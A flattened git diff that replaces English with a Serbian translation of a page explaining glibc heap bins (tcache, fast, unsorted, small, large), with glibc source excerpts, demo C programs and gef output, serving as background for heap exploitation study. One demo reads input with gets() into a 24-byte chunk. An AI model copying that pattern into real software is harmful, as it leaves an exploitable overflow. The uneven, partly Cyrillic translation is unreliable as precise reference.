## Bins & Memory Allocations/Frees -Check what are the bins and how are they organized and how memory is allocated and freed in: +Proverite koji su bins i kako su organizovani i kako se memorija alocira i oslobađa u: {{#ref}} bins-and-memory-allocations.md @@ -517,7 +491,7 @@ bins-and-memory-allocations.md ## Heap Functions Security Checks -Functions involved in heap will perform certain check before performing its actions to try to make sure the heap wasn't corrupted: +Funkcije uključene u heap će izvršiti određene provere pre nego što izvrše svoje akcije kako bi pokušale da osiguraju da heap nije oštećen: {{#ref}} heap-memory-functions/heap-functions-security-checks.md diff --git a/src/binary-exploitation/libc-heap/bins-and-memory-allocations.md b/src/binary-exploitation/libc-heap/bins-and-memory-allocations.md index eb184fc93..c02abb92a 100644 --- a/src/binary-exploitation/libc-heap/bins-and-memory-allocations.md +++ b/src/binary-exploitation/libc-heap/bins-and-memory-allocations.md @@ -2,60 +2,55 @@ {{#include ../../banners/hacktricks-training.md}} -## Basic Information +## Osnovne Informacije -In order to improve the efficiency on how chunks are stored every chunk is not just in one linked list, but there are several types. These are the bins and there are 5 type of bins: [62](https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=blob;f=malloc/malloc.c;h=6e766d11bc85b6480fa5c9f2a76559f8acf9deb5;hb=HEAD#l1407) small bins, 63 large bins, 1 unsorted bin, 10 fast bins and 64 tcache bins per thread. +Da bi se poboljšala efikasnost načina na koji se delovi čuvaju, svaki deo nije samo u jednoj povezanoj listi, već postoji nekoliko tipova. To su binovi i postoji 5 tipova binova: [62](https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=blob;f=malloc/malloc.c;h=6e766d11bc85b6480fa5c9f2a76559f8acf9deb5;hb=HEAD#l1407) mali binovi, 63 veliki binovi, 1 nesortirani bin, 10 brzih binova i 64 tcache binova po niti. -The initial address to each unsorted, small and large bins is inside the same array. The index 0 is unused, 1 is the unsorted bin, bins 2-64 are small bins and bins 65-127 are large bins. +Početna adresa za svaki nesortirani, mali i veliki bin je unutar istog niza. Indeks 0 se ne koristi, 1 je nesortirani bin, binovi 2-64 su mali binovi, a binovi 65-127 su veliki binovi. ### Tcache (Per-Thread Cache) Bins -Even though threads try to have their own heap (see [Arenas](bins-and-memory-allocations.md#arenas) and [Subheaps](bins-and-memory-allocations.md#subheaps)), there is the possibility that a process with a lot of threads (like a web server) **will end sharing the heap with another threads**. In this case, the main solution is the use of **lockers**, which might **slow down significantly the threads**. +Iako niti pokušavaju da imaju svoj vlastiti heap (vidi [Arenas](bins-and-memory-allocations.md#arenas) i [Subheaps](bins-and-memory-allocations.md#subheaps)), postoji mogućnost da proces sa puno niti (kao što je web server) **će završiti deljenjem heapa sa drugim nitima**. U ovom slučaju, glavno rešenje je korišćenje **zaključavanja**, što može **značajno usporiti niti**. -Therefore, a tcache is similar to a fast bin per thread in the way that it's a **single linked list** that doesn't merge chunks. Each thread has **64 singly-linked tcache bins**. Each bin can have a maximum of [7 same-size chunks](https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;h=2527e2504761744df2bdb1abdc02d936ff907ad2;hb=d5c3fafc4307c9b7a4c7d5cb381fcdbfad340bcc#l323) ranging from [24 to 1032B on 64-bit systems and 12 to 516B on 32-bit systems](https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;h=2527e2504761744df2bdb1abdc02d936ff907ad2;hb=d5c3fafc4307c9b7a4c7d5cb381fcdbfad340bcc#l315). +Stoga, tcache je sličan brzom binu po niti na način da je to **jedna povezana lista** koja ne spaja delove. Svaka nit ima **64 jednostruko povezane tcache binove**. Svaki bin može imati maksimalno [7 delova iste veličine](https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;h=2527e2504761744df2bdb1abdc02d936ff907ad2;hb=d5c3fafc4307c9b7a4c7d5cb381fcdbfad340bcc#l323) u rasponu od [24 do 1032B na 64-bitnim sistemima i 12 do 516B na 32-bitnim sistemima](https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;h=2527e2504761744df2bdb1abdc02d936ff907ad2;hb=d5c3fafc4307c9b7a4c7d5cb381fcdbfad340bcc#l315). -**When a thread frees** a chunk, **if it isn't too big** to be allocated in the tcache and the respective tcache bin **isn't full** (already 7 chunks), **it'll be allocated in there**. If it cannot go to the tcache, it'll need to wait for the heap lock to be able to perform the free operation globally. +**Kada nit oslobodi** deo, **ako nije prevelik** da bi se alocirao u tcache i odgovarajući tcache bin **nije pun** (već 7 delova), **biće alociran tamo**. Ako ne može da ide u tcache, moraće da čeka na zaključavanje heapa da bi mogla da izvrši operaciju oslobađanja globalno. -When a **chunk is allocated**, if there is a free chunk of the needed size in the **Tcache it'll use it**, if not, it'll need to wait for the heap lock to be able to find one in the global bins or create a new one.\ -There's also an optimization, in this case, while having the heap lock, the thread **will fill his Tcache with heap chunks (7) of the requested size**, so in case it needs more, it'll find them in Tcache. +Kada je **deo alociran**, ako postoji slobodan deo potrebne veličine u **Tcache, koristiće ga**, ako ne, moraće da čeka na zaključavanje heapa da bi mogla da pronađe jedan u globalnim binovima ili da kreira novi.\ +Takođe postoji optimizacija, u ovom slučaju, dok ima zaključavanje heapa, nit **će napuniti svoj Tcache delovima heapa (7) tražene veličine**, tako da u slučaju da mu zatreba više, naći će ih u Tcache.
-Add a tcache chunk example - +Dodaj primer tcache dela ```c #include #include int main(void) { - char *chunk; - chunk = malloc(24); - printf("Address of the chunk: %p\n", (void *)chunk); - gets(chunk); - free(chunk); - return 0; +char *chunk; +chunk = malloc(24); +printf("Address of the chunk: %p\n", (void *)chunk); +gets(chunk); +free(chunk); +return 0; } ``` - -Compile it and debug it with a breakpoint in the ret opcode from main function. then with gef you can see the tcache bin in use: - +Kompajlirajte ga i debagujte sa tačkom prekida u ret opkodu iz main funkcije. Tada sa gef možete videti tcache bin u upotrebi: ```bash gef➤ heap bins ──────────────────────────────────────────────────────────────────────────────── Tcachebins for thread 1 ──────────────────────────────────────────────────────────────────────────────── Tcachebins[idx=0, size=0x20, count=1] ← Chunk(addr=0xaaaaaaac12a0, size=0x20, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA) ``` -
-#### Tcache Structs & Functions +#### Tcache strukture i funkcije -In the following code it's possible to see the **max bins** and **chunks per index**, the **`tcache_entry`** struct created to avoid double frees and **`tcache_perthread_struct`**, a struct that each thread uses to store the addresses to each index of the bin. +U sledećem kodu moguće je videti **max bins** i **chunks per index**, **`tcache_entry`** strukturu kreiranu da izbegne duple oslobađanja i **`tcache_perthread_struct`**, strukturu koju svaka nit koristi za čuvanje adresa za svaki indeks bin-a.
-tcache_entry and tcache_perthread_struct - +tcache_entry i tcache_perthread_struct ```c // From https://github.com/bminor/glibc/blob/f942a732d37a96217ef828116ebe64a644db18d7/malloc/malloc.c @@ -72,135 +67,131 @@ In the following code it's possible to see the **max bins** and **chunks per ind # define usize2tidx(x) csize2tidx (request2size (x)) /* With rounding and alignment, the bins are... - idx 0 bytes 0..24 (64-bit) or 0..12 (32-bit) - idx 1 bytes 25..40 or 13..20 - idx 2 bytes 41..56 or 21..28 - etc. */ +idx 0 bytes 0..24 (64-bit) or 0..12 (32-bit) +idx 1 bytes 25..40 or 13..20 +idx 2 bytes 41..56 or 21..28 +etc. */ /* This is another arbitrary limit, which tunables can change. Each - tcache bin will hold at most this number of chunks. */ +tcache bin will hold at most this number of chunks. */ # define TCACHE_FILL_COUNT 7 /* Maximum chunks in tcache bins for tunables. This value must fit the range - of tcache->counts[] entries, else they may overflow. */ +of tcache->counts[] entries, else they may overflow. */ # define MAX_TCACHE_COUNT UINT16_MAX [...] typedef struct tcache_entry { - struct tcache_entry *next; - /* This field exists to detect double frees. */ - uintptr_t key; +struct tcache_entry *next; +/* This field exists to detect double frees. */ +uintptr_t key; } tcache_entry; /* There is one of these for each thread, which contains the - per-thread cache (hence "tcache_perthread_struct"). Keeping - overall size low is mildly important. Note that COUNTS and ENTRIES - are redundant (we could have just counted the linked list each - time), this is for performance reasons. */ +per-thread cache (hence "tcache_perthread_struct"). Keeping +overall size low is mildly important. Note that COUNTS and ENTRIES +are redundant (we could have just counted the linked list each +time), this is for performance reasons. */ typedef struct tcache_perthread_struct { - uint16_t counts[TCACHE_MAX_BINS]; - tcache_entry *entries[TCACHE_MAX_BINS]; +uint16_t counts[TCACHE_MAX_BINS]; +tcache_entry *entries[TCACHE_MAX_BINS]; } tcache_perthread_struct; ``` -
-The function `__tcache_init` is the function that creates and allocates the space for the `tcache_perthread_struct` obj +Funkcija `__tcache_init` je funkcija koja kreira i alocira prostor za objekat `tcache_perthread_struct`
-tcache_init code - +tcache_init kod ```c // From https://github.com/bminor/glibc/blob/f942a732d37a96217ef828116ebe64a644db18d7/malloc/malloc.c#L3241C1-L3274C2 static void tcache_init(void) { - mstate ar_ptr; - void *victim = 0; - const size_t bytes = sizeof (tcache_perthread_struct); +mstate ar_ptr; +void *victim = 0; +const size_t bytes = sizeof (tcache_perthread_struct); - if (tcache_shutting_down) - return; +if (tcache_shutting_down) +return; - arena_get (ar_ptr, bytes); - victim = _int_malloc (ar_ptr, bytes); - if (!victim && ar_ptr != NULL) - { - ar_ptr = arena_get_retry (ar_ptr, bytes); - victim = _int_malloc (ar_ptr, bytes); - } +arena_get (ar_ptr, bytes); +victim = _int_malloc (ar_ptr, bytes); +if (!victim && ar_ptr != NULL) +{ +ar_ptr = arena_get_retry (ar_ptr, bytes); +victim = _int_malloc (ar_ptr, bytes); +} - if (ar_ptr != NULL) - __libc_lock_unlock (ar_ptr->mutex); +if (ar_ptr != NULL) +__libc_lock_unlock (ar_ptr->mutex); - /* In a low memory situation, we may not be able to allocate memory - - in which case, we just keep trying later. However, we - typically do this very early, so either there is sufficient - memory, or there isn't enough memory to do non-trivial - allocations anyway. */ - if (victim) - { - tcache = (tcache_perthread_struct *) victim; - memset (tcache, 0, sizeof (tcache_perthread_struct)); - } +/* In a low memory situation, we may not be able to allocate memory +- in which case, we just keep trying later. However, we +typically do this very early, so either there is sufficient +memory, or there isn't enough memory to do non-trivial +allocations anyway. */ +if (victim) +{ +tcache = (tcache_perthread_struct *) victim; +memset (tcache, 0, sizeof (tcache_perthread_struct)); +} } ``` -
-#### Tcache Indexes +#### Tcache indeksi -The tcache have several bins depending on the size an the initial pointers to the **first chunk of each index and the amount of chunks per index are located inside a chunk**. This means that locating the chunk with this information (usually the first), it's possible to find all the tcache initial points and the amount of Tcache chunks. +Tcache ima nekoliko binova u zavisnosti od veličine, a inicijalni pokazivači na **prvi deo svakog indeksa i količina delova po indeksu nalaze se unutar dela**. To znači da lociranje dela sa ovom informacijom (obično prvim) omogućava pronalaženje svih tcache inicijalnih tačaka i količine Tcache delova. -### Fast bins +### Brzi binovi -Fast bins are designed to **speed up memory allocation for small chunks** by keeping recently freed chunks in a quick-access structure. These bins use a Last-In, First-Out (LIFO) approach, which means that the **most recently freed chunk is the first** to be reused when there's a new allocation request. This behaviour is advantageous for speed, as it's faster to insert and remove from the top of a stack (LIFO) compared to a queue (FIFO). +Brzi binovi su dizajnirani da **ubrza alokaciju memorije za male delove** čuvajući nedavno oslobođene delove u strukturi brzog pristupa. Ovi binovi koriste pristup Last-In, First-Out (LIFO), što znači da je **najnovije oslobođeni deo prvi** koji će se ponovo koristiti kada postoji nova zahtev za alokaciju. Ovo ponašanje je korisno za brzinu, jer je brže umetati i uklanjati sa vrha steka (LIFO) u poređenju sa redom (FIFO). -Additionally, **fast bins use singly linked lists**, not double linked, which further improves speed. Since chunks in fast bins aren't merged with neighbours, there's no need for a complex structure that allows removal from the middle. A singly linked list is simpler and quicker for these operations. +Pored toga, **brzi binovi koriste jednostruko povezane liste**, a ne dvostruko povezane, što dodatno poboljšava brzinu. Pošto se delovi u brzim binovima ne spajaju sa susedima, nema potrebe za složenom strukturom koja omogućava uklanjanje iz sredine. Jednostruko povezana lista je jednostavnija i brža za ove operacije. -Basically, what happens here is that the header (the pointer to the first chunk to check) is always pointing to the latest freed chunk of that size. So: +U suštini, ono što se ovde dešava je da je zaglavlje (pokazivač na prvi deo koji treba proveriti) uvek usmereno na najnovije oslobođeni deo te veličine. Dakle: -- When a new chunk is allocated of that size, the header is pointing to a free chunk to use. As this free chunk is pointing to the next one to use, this address is stored in the header so the next allocation knows where to get an available chunk -- When a chunk is freed, the free chunk will save the address to the current available chunk and the address to this newly freed chunk will be put in the header +- Kada se alocira novi deo te veličine, zaglavlje pokazuje na slobodan deo koji se može koristiti. Pošto ovaj slobodan deo pokazuje na sledeći koji se može koristiti, ova adresa se čuva u zaglavlju tako da sledeća alokacija zna gde da pronađe dostupni deo. +- Kada se deo oslobodi, slobodan deo će sačuvati adresu trenutnog dostupnog dela, a adresa ovog novog oslobođenog dela će biti stavljena u zaglavlje. -The maximum size of a linked list is `0x80` and they are organized so a chunk of size `0x20` will be in index `0`, a chunk of size `0x30` would be in index `1`... - -> [!CAUTION] -> Chunks in fast bins aren't set as available so they are keep as fast bin chunks for some time instead of being able to merge with other free chunks surrounding them. +Maksimalna veličina povezane liste je `0x80` i organizovane su tako da će deo veličine `0x20` biti u indeksu `0`, deo veličine `0x30` biće u indeksu `1`... +> [!OPREZ] +> Delovi u brzim binovima nisu postavljeni kao dostupni, tako da se čuvaju kao delovi brzih binova neko vreme umesto da se mogu spojiti sa drugim slobodnim delovima koji ih okružuju. ```c // From https://github.com/bminor/glibc/blob/a07e000e82cb71238259e674529c37c12dc7d423/malloc/malloc.c#L1711 /* - Fastbins +Fastbins - An array of lists holding recently freed small chunks. Fastbins - are not doubly linked. It is faster to single-link them, and - since chunks are never removed from the middles of these lists, - double linking is not necessary. Also, unlike regular bins, they - are not even processed in FIFO order (they use faster LIFO) since - ordering doesn't much matter in the transient contexts in which - fastbins are normally used. +An array of lists holding recently freed small chunks. Fastbins +are not doubly linked. It is faster to single-link them, and +since chunks are never removed from the middles of these lists, +double linking is not necessary. Also, unlike regular bins, they +are not even processed in FIFO order (they use faster LIFO) since +ordering doesn't much matter in the transient contexts in which +fastbins are normally used. - Chunks in fastbins keep their inuse bit set, so they cannot - be consolidated with other free chunks. malloc_consolidate - releases all chunks in fastbins and consolidates them with - other free chunks. - */ +Chunks in fastbins keep their inuse bit set, so they cannot +be consolidated with other free chunks. malloc_consolidate +releases all chunks in fastbins and consolidates them with +other free chunks. +*/ typedef struct malloc_chunk *mfastbinptr; #define fastbin(ar_ptr, idx) ((ar_ptr)->fastbinsY[idx]) /* offset 2 to use otherwise unindexable first 2 bins */ #define fastbin_index(sz) \ - ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2) +((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2) /* The maximum fastbin request size we support */ @@ -208,43 +199,39 @@ typedef struct malloc_chunk *mfastbinptr; #define NFASTBINS (fastbin_index (request2size (MAX_FAST_SIZE)) + 1) ``` -
-Add a fastbin chunk example - +Dodajte primer fastbin chunk-a ```c #include #include int main(void) { - char *chunks[8]; - int i; +char *chunks[8]; +int i; - // Loop to allocate memory 8 times - for (i = 0; i < 8; i++) { - chunks[i] = malloc(24); - if (chunks[i] == NULL) { // Check if malloc failed - fprintf(stderr, "Memory allocation failed at iteration %d\n", i); - return 1; - } - printf("Address of chunk %d: %p\n", i, (void *)chunks[i]); - } +// Loop to allocate memory 8 times +for (i = 0; i < 8; i++) { +chunks[i] = malloc(24); +if (chunks[i] == NULL) { // Check if malloc failed +fprintf(stderr, "Memory allocation failed at iteration %d\n", i); +return 1; +} +printf("Address of chunk %d: %p\n", i, (void *)chunks[i]); +} - // Loop to free the allocated memory - for (i = 0; i < 8; i++) { - free(chunks[i]); - } +// Loop to free the allocated memory +for (i = 0; i < 8; i++) { +free(chunks[i]); +} - return 0; +return 0; } ``` +Napomena kako alociramo i oslobađamo 8 delova iste veličine tako da popune tcache, a osmi se čuva u fast chunk. -Note how we allocate and free 8 chunks of the same size so they fill the tcache and the eight one is stored in the fast chunk. - -Compile it and debug it with a breakpoint in the `ret` opcode from `main` function. then with `gef` you can see that the tcache bin is full and one chunk is in the fast bin: - +Kompajlirajte to i debagujte sa breakpoint-om u `ret` opcode-u iz `main` funkcije. Tada sa `gef` možete videti da je tcache bin pun i da je jedan chunk u fast bin: ```bash gef➤ heap bins ──────────────────────────────────────────────────────────────────────────────── Tcachebins for thread 1 ──────────────────────────────────────────────────────────────────────────────── @@ -253,58 +240,54 @@ Tcachebins[idx=0, size=0x20, count=7] ← Chunk(addr=0xaaaaaaac1770, size=0x20, Fastbins[idx=0, size=0x20] ← Chunk(addr=0xaaaaaaac1790, size=0x20, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA) Fastbins[idx=1, size=0x30] 0x00 ``` -
-### Unsorted bin +### Neuređeni kontejner -The unsorted bin is a **cache** used by the heap manager to make memory allocation quicker. Here's how it works: When a program frees a chunk, and if this chunk cannot be allocated in a tcache or fast bin and is not colliding with the top chunk, the heap manager doesn't immediately put it in a specific small or large bin. Instead, it first tries to **merge it with any neighbouring free chunks** to create a larger block of free memory. Then, it places this new chunk in a general bin called the "unsorted bin." +Neuređeni kontejner je **keš** koji koristi upravitelj heap-a kako bi ubrzao alokaciju memorije. Evo kako to funkcioniše: Kada program oslobodi deo memorije, i ako se taj deo ne može alocirati u tcache ili fast bin i ne sudara se sa vrhunskim delom, upravitelj heap-a ga odmah ne stavlja u određeni mali ili veliki kontejner. Umesto toga, prvo pokušava da **spoji ga sa bilo kojim susednim slobodnim delovima** kako bi stvorio veći blok slobodne memorije. Zatim, stavlja ovaj novi deo u opšti kontejner nazvan "neuređeni kontejner." -When a program **asks for memory**, the heap manager **checks the unsorted bin** to see if there's a chunk of enough size. If it finds one, it uses it right away. If it doesn't find a suitable chunk in the unsorted bin, it moves all the chunks in this list to their corresponding bins, either small or large, based on their size. +Kada program **traži memoriju**, upravitelj heap-a **proverava neuređeni kontejner** da vidi da li postoji deo dovoljne veličine. Ako ga pronađe, odmah ga koristi. Ako ne pronađe odgovarajući deo u neuređenom kontejneru, premestiće sve delove u ovoj listi u njihove odgovarajuće kontejnere, bilo male ili velike, na osnovu njihove veličine. -Note that if a larger chunk is split in 2 halves and the rest is larger than MINSIZE, it'll be paced back into the unsorted bin. +Napomena: ako se veći deo podeli na 2 polovine i ostatak je veći od MINSIZE, biće vraćen nazad u neuređeni kontejner. -So, the unsorted bin is a way to speed up memory allocation by quickly reusing recently freed memory and reducing the need for time-consuming searches and merges. +Dakle, neuređeni kontejner je način da se ubrza alokacija memorije brzo ponovnim korišćenjem nedavno oslobođene memorije i smanji potreba za vremenski zahtevnim pretragama i spajanjima. > [!CAUTION] -> Note that even if chunks are of different categories, if an available chunk is colliding with another available chunk (even if they belong originally to different bins), they will be merged. +> Napomena: čak i ako su delovi različitih kategorija, ako se dostupan deo sudara sa drugim dostupnim delom (čak i ako prvobitno pripadaju različitim kontejnerima), biće spojeni.
-Add a unsorted chunk example - +Dodaj primer neuređenog dela ```c #include #include int main(void) { - char *chunks[9]; - int i; +char *chunks[9]; +int i; - // Loop to allocate memory 8 times - for (i = 0; i < 9; i++) { - chunks[i] = malloc(0x100); - if (chunks[i] == NULL) { // Check if malloc failed - fprintf(stderr, "Memory allocation failed at iteration %d\n", i); - return 1; - } - printf("Address of chunk %d: %p\n", i, (void *)chunks[i]); - } +// Loop to allocate memory 8 times +for (i = 0; i < 9; i++) { +chunks[i] = malloc(0x100); +if (chunks[i] == NULL) { // Check if malloc failed +fprintf(stderr, "Memory allocation failed at iteration %d\n", i); +return 1; +} +printf("Address of chunk %d: %p\n", i, (void *)chunks[i]); +} - // Loop to free the allocated memory - for (i = 0; i < 8; i++) { - free(chunks[i]); - } +// Loop to free the allocated memory +for (i = 0; i < 8; i++) { +free(chunks[i]); +} - return 0; +return 0; } ``` +Napomena kako alociramo i oslobađamo 9 delova iste veličine tako da **popune tcache** i osmi se čuva u nesortiranom binu jer je **prevelik za fastbin**, a deveti nije oslobođen, tako da se deveti i osmi **ne spajaju sa vrhunskim delom**. -Note how we allocate and free 9 chunks of the same size so they **fill the tcache** and the eight one is stored in the unsorted bin because it's **too big for the fastbin** and the nineth one isn't freed so the nineth and the eighth **don't get merged with the top chunk**. - -Compile it and debug it with a breakpoint in the `ret` opcode from `main` function. Then with `gef` you can see that the tcache bin is full and one chunk is in the unsorted bin: - +Kompajlirajte to i debagujte sa tačkom prekida u `ret` opkodu iz `main` funkcije. Tada sa `gef` možete videti da je tcache bin pun i jedan deo je u nesortiranom binu: ```bash gef➤ heap bins ──────────────────────────────────────────────────────────────────────────────── Tcachebins for thread 1 ──────────────────────────────────────────────────────────────────────────────── @@ -319,23 +302,21 @@ Fastbins[idx=5, size=0x70] 0x00 Fastbins[idx=6, size=0x80] 0x00 ─────────────────────────────────────────────────────────────────────── Unsorted Bin for arena at 0xfffff7f90b00 ─────────────────────────────────────────────────────────────────────── [+] unsorted_bins[0]: fw=0xaaaaaaac1e10, bk=0xaaaaaaac1e10 - → Chunk(addr=0xaaaaaaac1e20, size=0x110, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA) +→ Chunk(addr=0xaaaaaaac1e20, size=0x110, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA) [+] Found 1 chunks in unsorted bin. ``` -
-### Small Bins +### Male Bine -Small bins are faster than large bins but slower than fast bins. +Male bine su brže od velikih bina, ali sporije od brzih bina. -Each bin of the 62 will have **chunks of the same size**: 16, 24, ... (with a max size of 504 bytes in 32bits and 1024 in 64bits). This helps in the speed on finding the bin where a space should be allocated and inserting and removing of entries on these lists. +Svaki bin od 62 će imati **delove iste veličine**: 16, 24, ... (sa maksimalnom veličinom od 504 bajta u 32bita i 1024 u 64bita). Ovo pomaže u brzini pronalaženja bina gde bi prostor trebao biti dodeljen i umetanja i uklanjanja unosa na ovim listama. -This is how the size of the small bin is calculated according to the index of the bin: - -- Smallest size: 2\*4\*index (e.g. index 5 -> 40) -- Biggest size: 2\*8\*index (e.g. index 5 -> 80) +Ovako se veličina malog bina izračunava prema indeksu bina: +- Najmanja veličina: 2\*4\*indeks (npr. indeks 5 -> 40) +- Najveća veličina: 2\*8\*indeks (npr. indeks 5 -> 80) ```c // From https://github.com/bminor/glibc/blob/a07e000e82cb71238259e674529c37c12dc7d423/malloc/malloc.c#L1711 #define NSMALLBINS 64 @@ -344,58 +325,52 @@ This is how the size of the small bin is calculated according to the index of th #define MIN_LARGE_SIZE ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH) #define in_smallbin_range(sz) \ - ((unsigned long) (sz) < (unsigned long) MIN_LARGE_SIZE) +((unsigned long) (sz) < (unsigned long) MIN_LARGE_SIZE) #define smallbin_index(sz) \ - ((SMALLBIN_WIDTH == 16 ? (((unsigned) (sz)) >> 4) : (((unsigned) (sz)) >> 3))\ - + SMALLBIN_CORRECTION) +((SMALLBIN_WIDTH == 16 ? (((unsigned) (sz)) >> 4) : (((unsigned) (sz)) >> 3))\ ++ SMALLBIN_CORRECTION) ``` - -Function to choose between small and large bins: - +Функција за избор између малих и великих контејнера: ```c #define bin_index(sz) \ - ((in_smallbin_range (sz)) ? smallbin_index (sz) : largebin_index (sz)) +((in_smallbin_range (sz)) ? smallbin_index (sz) : largebin_index (sz)) ``` -
-Add a small chunk example - +Dodajte mali primer ```c #include #include int main(void) { - char *chunks[10]; - int i; +char *chunks[10]; +int i; - // Loop to allocate memory 8 times - for (i = 0; i < 9; i++) { - chunks[i] = malloc(0x100); - if (chunks[i] == NULL) { // Check if malloc failed - fprintf(stderr, "Memory allocation failed at iteration %d\n", i); - return 1; - } - printf("Address of chunk %d: %p\n", i, (void *)chunks[i]); - } +// Loop to allocate memory 8 times +for (i = 0; i < 9; i++) { +chunks[i] = malloc(0x100); +if (chunks[i] == NULL) { // Check if malloc failed +fprintf(stderr, "Memory allocation failed at iteration %d\n", i); +return 1; +} +printf("Address of chunk %d: %p\n", i, (void *)chunks[i]); +} - // Loop to free the allocated memory - for (i = 0; i < 8; i++) { - free(chunks[i]); - } +// Loop to free the allocated memory +for (i = 0; i < 8; i++) { +free(chunks[i]); +} - chunks[9] = malloc(0x110); +chunks[9] = malloc(0x110); - return 0; +return 0; } ``` +Napomena kako alociramo i oslobađamo 9 delova iste veličine tako da **popunimo tcache** i osmi se čuva u nesortiranom binu jer je **prevelik za fastbin**, a deveti nije oslobođen, tako da se deveti i osmi **ne spajaju sa vrhunskim delom**. Zatim alociramo veći deo od 0x110 što čini da **deo u nesortiranom binu ide u mali bin**. -Note how we allocate and free 9 chunks of the same size so they **fill the tcache** and the eight one is stored in the unsorted bin because it's **too big for the fastbin** and the ninth one isn't freed so the ninth and the eights **don't get merged with the top chunk**. Then we allocate a bigger chunk of 0x110 which makes **the chunk in the unsorted bin goes to the small bin**. - -Compile it and debug it with a breakpoint in the `ret` opcode from `main` function. then with `gef` you can see that the tcache bin is full and one chunk is in the small bin: - +Kompajlirajte to i debagujte sa tačkom prekida u `ret` opkodu iz `main` funkcije. Tada sa `gef` možete videti da je tcache bin pun i da je jedan deo u malom binu: ```bash gef➤ heap bins ──────────────────────────────────────────────────────────────────────────────── Tcachebins for thread 1 ──────────────────────────────────────────────────────────────────────────────── @@ -412,96 +387,90 @@ Fastbins[idx=6, size=0x80] 0x00 [+] Found 0 chunks in unsorted bin. ──────────────────────────────────────────────────────────────────────── Small Bins for arena at 0xfffff7f90b00 ──────────────────────────────────────────────────────────────────────── [+] small_bins[16]: fw=0xaaaaaaac1e10, bk=0xaaaaaaac1e10 - → Chunk(addr=0xaaaaaaac1e20, size=0x110, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA) +→ Chunk(addr=0xaaaaaaac1e20, size=0x110, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA) [+] Found 1 chunks in 1 small non-empty bins. ``` -
-### Large bins +### Veliki kontejneri -Unlike small bins, which manage chunks of fixed sizes, each **large bin handle a range of chunk sizes**. This is more flexible, allowing the system to accommodate **various sizes** without needing a separate bin for each size. +Za razliku od malih kontejnera, koji upravljaju delovima fiksnih veličina, svaki **veliki kontejner upravlja opsegom veličina delova**. Ovo je fleksibilnije, omogućavajući sistemu da prilagodi **različite veličine** bez potrebe za posebnim kontejnerom za svaku veličinu. -In a memory allocator, large bins start where small bins end. The ranges for large bins grow progressively larger, meaning the first bin might cover chunks from 512 to 576 bytes, while the next covers 576 to 640 bytes. This pattern continues, with the largest bin containing all chunks above 1MB. +U alokatoru memorije, veliki kontejneri počinju gde mali kontejneri završavaju. Opsezi za velike kontejneri postaju progresivno veći, što znači da prvi kontejner može pokriti delove od 512 do 576 bajtova, dok sledeći pokriva od 576 do 640 bajtova. Ovaj obrazac se nastavlja, pri čemu najveći kontejner sadrži sve delove iznad 1MB. -Large bins are slower to operate compared to small bins because they must **sort and search through a list of varying chunk sizes to find the best fit** for an allocation. When a chunk is inserted into a large bin, it has to be sorted, and when memory is allocated, the system must find the right chunk. This extra work makes them **slower**, but since large allocations are less common than small ones, it's an acceptable trade-off. +Veliki kontejneri su sporiji za rad u poređenju sa malim kontejnerima jer moraju **sortirati i pretraživati listu delova različitih veličina kako bi pronašli najbolju opciju** za alokaciju. Kada se deo umetne u veliki kontejner, mora se sortirati, a kada se memorija alocira, sistem mora pronaći pravi deo. Ovaj dodatni rad ih čini **sporijim**, ali pošto su velike alokacije ređe od malih, to je prihvatljiva kompenzacija. -There are: +Postoji: -- 32 bins of 64B range (collide with small bins) -- 16 bins of 512B range (collide with small bins) -- 8bins of 4096B range (part collide with small bins) -- 4bins of 32768B range -- 2bins of 262144B range -- 1bin for remaining sizes +- 32 kontejnera opsega 64B (sukob sa malim kontejnerima) +- 16 kontejnera opsega 512B (sukob sa malim kontejnerima) +- 8 kontejnera opsega 4096B (delimično sukob sa malim kontejnerima) +- 4 kontejnera opsega 32768B +- 2 kontejnera opsega 262144B +- 1 kontejner za preostale veličine
-Large bin sizes code - +Kod veličina velikih kontejnera ```c // From https://github.com/bminor/glibc/blob/a07e000e82cb71238259e674529c37c12dc7d423/malloc/malloc.c#L1711 #define largebin_index_32(sz) \ - (((((unsigned long) (sz)) >> 6) <= 38) ? 56 + (((unsigned long) (sz)) >> 6) :\ - ((((unsigned long) (sz)) >> 9) <= 20) ? 91 + (((unsigned long) (sz)) >> 9) :\ - ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\ - ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\ - ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\ - 126) +(((((unsigned long) (sz)) >> 6) <= 38) ? 56 + (((unsigned long) (sz)) >> 6) :\ +((((unsigned long) (sz)) >> 9) <= 20) ? 91 + (((unsigned long) (sz)) >> 9) :\ +((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\ +((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\ +((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\ +126) #define largebin_index_32_big(sz) \ - (((((unsigned long) (sz)) >> 6) <= 45) ? 49 + (((unsigned long) (sz)) >> 6) :\ - ((((unsigned long) (sz)) >> 9) <= 20) ? 91 + (((unsigned long) (sz)) >> 9) :\ - ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\ - ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\ - ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\ - 126) +(((((unsigned long) (sz)) >> 6) 